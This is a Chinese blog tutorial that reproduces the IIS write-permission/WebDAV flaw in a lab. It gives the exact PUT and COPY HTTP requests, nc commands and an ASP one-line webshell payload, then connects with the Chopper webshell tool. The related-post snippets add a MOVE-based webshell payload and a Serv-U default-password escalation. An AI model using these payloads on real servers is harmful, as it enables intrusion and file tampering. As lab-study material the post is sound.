IIS写权限漏洞获取Webshell

最新推荐文章于 2024-07-25 17:45:25 发布
最新推荐文章于 2024-07-25 17:45:25 发布
阅读量623 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 服务器 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51641247/article/details/130800667
版权

服务安装

IIS服务器属于Windows平台,建议使用windows Server 2003或2008系统。

在系统启动菜单中运行IIS,如果没有该选项,说明iis没有进行默认安装,可以通过“控制面板”-“添加或删除程序”手动进行安装。

以此选择“添加/删除组件”-“应用程序服务器”

属性配置

环境搭好后,需要进行一些默认配置,在管理工具中,找到Internet信息服务管理器

 进入后找到默认网站,右键属性

在弹出的窗口打开主目录,并勾选“脚本资源访问”和“写入”

 在“Web服务扩展”中,将“Active Server Pages” ,“WebDAV”两个选项设置为允许。

 

 其中,Active ServerPages为ASP的全称,对于一般的ASP服务来说,该选项是必须要启用的,否则网站仅支持HTML,JPG等静态资源。而WebDAV是漏洞成因之一,必须手动开启。

修改完配置后,需要重启iis服务,选择默认网站,点机上方停止按钮,再点机启动按钮。

 

构造请求

开启配置后,可以使用NC或burpsuite构造http请求来完成,或者直接使用工具。(这里使用nc构造请求)。

  1. 首先构造PUT请求,创建put.txt文件,请求的http报文如下:

请求内容为:上传一个2.txt文件,到192.168.249.140,文件内容为<%execute(request("key"))%>

PUT /2.txt HTTP/1.1
Host:192.168.249.140
Content-Length:31

<%execute(request("key"))%>
/r/n
/r/n    #末尾有两个连续的换行

如图所示

 

    2.使用nc发起请求,命令如下

nc 192.168.249.140 80 <put.txt

 返回201 ,内容如下

   3.接着发起COPY请求,需新建copy.txt,文件内容如下(注末尾有两个连续的换行)

COPY /2.txt HTTP/1.1
Host:192.168.249.140
Destination:http://192.168.249.140/2.asp

  发送请求

nc 192.168.249.140 80 <copy.txt

 请求完成,同样返回201 Created ,说明已经成功获取到Webshell

  4.在浏览器中进行验证

http://192.168.249.140/2.asp?key=Response.Write(“hello”)

浏览器成功打印 “hello”

 5.对于一句话木马的利用,还可以使用webshell工具进行连接,这里使用“菜刀”连接

填写shell地址和连接密码

 连接成功后,可以通过菜刀看到网站目录下的文件结构,同时还可以使用编辑,上传文件,下载,删除文件等功能

 

-飞飞鱼
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IIS中间件四大漏洞分析
fansenliangren的博客
12-27 873
关于IIS中间件四大漏洞漏洞原理,漏洞危害,检测条件,检测方法,和修复建议的简要介绍。
IIS权限漏洞.rar
05-06
**IIS权限漏洞详解** IIS(Internet Information Services)是微软公司提供的一个Web服务器服务,广泛用于托管网站和应用程序。然而,如同任何其他软件一样,IIS也存在安全漏洞,其中一种常见的问题是权限漏洞...
文件上传之IIS—put漏洞
一个普普通通的博客
03-16 4629
iis—put漏洞
针对IIS权限漏洞获取webshell方法
vcdy
09-04 2684
向网站入2.txt 内容为一句话木马 PUT /2.txt HTTP/1.1 Destination: /teslt.asp;.jpg Host: 219.153.49.228:43289 Content-Length: 4   &lt;%eval request("chopper")%&gt;   改2.txt为2.asPp MOVE /2.txt HTTP/1.1 De...
IIS 漏洞工具解析
明哥哥知识分享
09-16 2119
1. 概述通过学习文档内容。 熟悉并掌握 IIS 漏洞利用工具的利用方法,了解具体的功能内 容,亲自实践操作,并根据课程需求完成相关任务。 2. 工具功能说明 IIS 漏洞利用工具是由桂林老兵的一款漏洞利用工具,专门针对 IIS 漏洞。 接下来我们具体介绍一下相关的使用。 2.1.第一部分 数据包格式 该功能模块默认的数据包传输方法有 7 种,分别是: OPTIONS 返回服务器的各种信息 PUT 生成上传文件数据包的。 POST 用来提交表单 MOVE 是改名数据包。 COPY 是复制数
服务器系统获取最高权限,webshell+servu获取系统最高权限
weixin_35970228的博客
08-05 694
您正在看的ftp服务器教程是:webshell+servu获取系统最高权限。下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法。原理:serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -...
IIS6.0相关漏洞复现
qq_52643498的博客
08-30 2061
IIS6的靶场练习,包含IIS PUT权限漏洞IIS6 文件名解析漏洞IIS6 目录解析漏洞的复现。
文件上传漏洞webshell)和文件包含漏洞
weixin_49390750的博客
08-08 829
文件上传漏洞webshell
Iis权限漏洞认识
weixin_34313182的博客
10-13 168
Iis权限漏洞是由于iis的网站主目录权限设置不当造成的,严格来说不属于iis漏洞。网站主目录设置可权限,可直接往服务器文件,漏洞威胁级别较高。 漏洞成可利用的条件 1、 网站主目录权限允许入和脚本资源访问。如果只有权限,利用时只能上传txt文件,使用move方法将txt文件改正可执行脚本,需要脚本资源访问权限。 2、 WebDAV服务器扩...
服务器系统获取最高权限,webshell+serv-u获取系统最高权限
weixin_39589644的博客
08-05 355
下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法。原理:serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用...
IIS权限利用工具
10-24
权限漏洞通常出现在服务器配置不当的情况下,比如将网站的上传目录设置为可。一旦攻击者发现这样的漏洞,他们可以通过上传恶意脚本(如Webshell)并执行,以获取服务器控制权,进行数据泄露、网站篡改、植入后门...
iis权限利用工具
11-14
iis权限利用工具”是一种专门针对IIS服务器权限漏洞进行测试和利用的工具。这类工具通常由网络安全领域的专家或研究人员开发,用于帮助管理员发现和修复系统中的潜在风险。"老兵的作品,用着还行吧"这句话暗示...
IIS权限利用工具.rar
10-14
然而,像任何其他软件一样,IIS也可能存在安全漏洞,其中之一就是权限漏洞。这个压缩包文件"IIS权限利用工具.rar"似乎包含了用于检测或利用此类漏洞的工具。 IIS权限漏洞通常指的是攻击者通过某种方式获得了...
一个ASP.Net下的WebShell实例
10-27
本文将详细解析一个特定的ASP.Net WebShell实例,它主要用于执行CMD命令,利用ASP.Net用户较高的权限来实现对服务器的非法操作。 ### WebShell的基本概念 WebShell通常是一个Web页面,它具有后门功能,允许攻击者...
linux ftp操作记录
m0_74318255的博客
07-24 222
你需要首先确认FTP用户是否是系统用户,还是FTP服务器软件(如Pure-FTPd)使用虚拟用户。如果你的FTP服务器使用系统用户,那么你需要先创建该用户。的错误,这意味着系统中不存在名为。这将创建一个新的系统用户。
初创小程序公司怎么选服务器合作商
最新发布
qq177803623的博客
07-25 476
同时,稳定性是衡量服务器性能的重要指标,一个频繁出现宕机、访问延迟的服务商,无疑会给企业的品牌形象和业务运营带来巨大损失。在移动互联网的浪潮中,小程序以其轻量、便捷、即用即走的特点,成为了众多初创企业快速触达用户、展现创意与服务的理想平台。一个优秀的服务器服务商,不仅仅提供基础的计算资源,更应当构建完善的生态系统,提供包括数据库、缓存、安全、监控等在内的全方位解决方案。通过前期的咨询、合作过程中的问题反馈以及售后服务的体验,可以初步判断服务商的服务质量和态度,为未来的合作奠定良好的基础。
Linux - 进程间通信
weixin_64099089的博客
07-25 778
进程间通信的方式
python自动化运维 通过paramiko库和time库实现服务器自动化管理
pymzy666skr的博客
07-25 746
在数字化时代,IT 基础设施的规模和复杂性不断增长,传统的手动管理方法已不再适用。自动化运维,作为 IT 运维管理的新范式,正变得越来越重要。它不仅能够显著提升运维效率,降低人为错误,还能确保业务连续性和系统的高可用性。Python,以其简洁的语法和强大的功能,成为自动化运维的优选语言。借助 Python,我们可以快速开发出灵活且强大的自动化脚本,以应对各种运维场景。
Webshell获取权限提升技术详解
"这篇资料主要介绍了获取Webshell的方法,适合初学者学习,涵盖了多种权限提升技巧,包括查找敏感路径、利用特定目录权限、利用系统工具以及利用特定文件和配置文件来提升权限。" Webshell是一种在网络应用中获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值